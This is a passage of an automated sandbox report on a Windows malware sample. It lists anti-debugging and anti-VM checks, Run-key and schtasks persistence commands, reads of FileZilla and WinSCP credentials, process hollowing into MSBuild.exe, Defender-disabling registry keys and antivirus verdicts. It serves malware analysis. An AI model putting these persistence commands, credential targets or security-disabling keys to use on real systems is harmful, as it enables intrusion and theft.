NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 1780 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000278		3221225496
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2668 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000288		3221225496
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2920 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0

Checks for the presence of known windows from debuggers and forensic tools (12 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA July 20, 2024, 8:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 20, 2024, 8:08 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5	reg_value	C:\Users\test22\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

Operates on local firewall's policies and settings (1 event)

registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Deletes executed files from disk (1 event)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA July 20, 2024, 8:07 p.m.	key_handle: 0x0000000000000514 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Drops a binary and executes it (1 event)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Executes one or more WMI queries (3 events)

wmi	Select * From AntiVirusProduct
wmi	Select * From AntiVirusProductroot\SecurityCente
wmi	Select * From Win32_OperatingSystemRO

Manipulates memory of a non-child process indicative of process injection (10 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 148 manipulating memory of non-child process 2924
Process injection	Process 148 manipulating memory of non-child process 944
Process injection	Process 148 manipulating memory of non-child process 2808
Process injection	Process 148 manipulating memory of non-child process 1780
Process injection	Process 148 manipulating memory of non-child process 2668
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2924 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264	3221225496	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 944 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268	3221225496	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2808 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000270	3221225496	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 1780 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000278	3221225496	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2668 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000288	3221225496	0

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $M°! Ñ`r Ñ`r Ñ`rf§þrÑ`rf§Êr2Ñ`r©ãrÑ`r©órÑ`r¨as Ñ`r ÑarÑ`rf§Ër!Ñ`rf§ýrÑ`rRich Ñ`rPELYfà ºâQÐ@$Öß@ÀSXÀSX?´ #°°#ì Ð¨.text¸º `.rdataêwÐx¾@@.dataÈE!P&6@À.rsrc° #\@@.relocÜA°#B^@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: 0 HX #Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0063a000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2920 process_handle: 0x00000260	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $M°! Ñ`r Ñ`r Ñ`rf§þrÑ`rf§Êr2Ñ`r©ãrÑ`r©órÑ`r¨as Ñ`r ÑarÑ`rf§Ër!Ñ`rf§ýrÑ`rRich Ñ`rPELYfà ºâQÐ@$Öß@ÀSXÀSX?´ #°°#ì Ð¨.text¸º `.rdataêwÐx¾@@.dataÈE!P&6@À.rsrc° #\@@.relocÜA°#B^@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x00000260	1	1	0

Collects information about installed applications (28 events)

Time & API	Arguments	Status
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Sound Changer Beta 1.2.2.1 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sound Changer Beta_is1\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA July 20, 2024, 8:08 p.m.	key_handle: 0x00000574 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

Bkav	W64.AIDetectMalware
Elastic	malicious (high confidence)
Skyhigh	BehavesLike.Win64.Generic.rc
Cylance	Unsafe
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/Agent_AGen.AZB
APEX	Malicious
Avast	Win64:Evo-gen [Trj]
McAfeeD	Real Protect-LS!8F8F6A36A8B8
FireEye	Generic.mg.8f8f6a36a8b827ce
Microsoft	Program:Win32/Wacapew.C!ml
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.3126725688
AVG	Win64:Evo-gen [Trj]
CrowdStrike	win/malicious_confidence_60% (D)

Network activity contains more than one unique useragent (2 events)

process	MSBuild.exe				useragent
process	MSBuild.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 called NtSetContextThread to modify thread in remote process 2920
NtSetContextThread July 20, 2024, 8:08 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4280588 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 2920	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 resumed a thread in remote process 2920
Process injection	Process 2920 resumed a thread in remote process 2088
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2920	1	0	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2088	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 20, 2024, 8:08 p.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: exception.instruction_r: ed e9 28 29 03 00 de e9 5d ac 0a 00 00 00 62 c4 exception.symbol: d_lr3ok7w7oldh8q70lfmuk9+0x5bd977 exception.instruction: in eax, dx exception.module: D_Lr3ok7w7oLDH8Q70lFMUK9.exe exception.exception_code: 0xc0000096 exception.offset: 6019447 exception.address: 0x160d977 registers.esp: 4128088 registers.edi: 21602424 registers.eax: 1447909480 registers.ebp: 18194432 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1	0	0

Disables Windows Security features (10 events)

description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{96A71B96-E5D5-452A-8597-F0935DF5523E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe

Executed a process and injected code into it, probably while unpacking (50 out of 58 events)

Time & API	Arguments	Status	Return
NtResumeThread July 20, 2024, 8:07 p.m.	thread_handle: 0x00000000000003a8 suspend_count: 1 process_identifier: 2552	1	0
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 1356 thread_handle: 0x00000000000005cc process_identifier: 1264 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\d_RIPuBmnjojf5JMU6a5QhMe.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000000003bc	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2188 thread_handle: 0x0000000000000640 process_identifier: 148 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\nHLIm6xHX7c236uOGqXkdPJG.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000000005c4	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 1400 thread_handle: 0x00000000000003ec process_identifier: 2164 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\EN4TCgpUszKEwT9miRPGOajK.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000000000062c	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2200 thread_handle: 0x0000000000000644 process_identifier: 2196 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\y0Q2LMuickieMvG8m310BTdg.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000404	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2232 thread_handle: 0x0000000000000630 process_identifier: 2212 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\D_Lr3ok7w7oLDH8Q70lFMUK9.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000638	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2272 thread_handle: 0x0000000000000548 process_identifier: 2224 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\FjsNdi4kjdtz2qw1MphlaqEs.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000000005b4	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2280 thread_handle: 0x0000000000000648 process_identifier: 2276 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\rYWTjDsqXT4AcDkoeJs_yZP2.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000614	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2364 thread_handle: 0x0000000000000624 process_identifier: 2368 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\7CF2bZR8HWtuPTUKAqzCc3OT.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000000000000604	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2328 thread_handle: 0x00000000000003bc process_identifier: 2320 current_directory: filepath: track: 1 command_line: C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000000005cc	1	1
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 148	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 148	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000001c0 suspend_count: 1 process_identifier: 148	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 148	1	0
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 148	1	0
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2908 thread_handle: 0x00000260 process_identifier: 2924 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000264	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x00000260	1	0
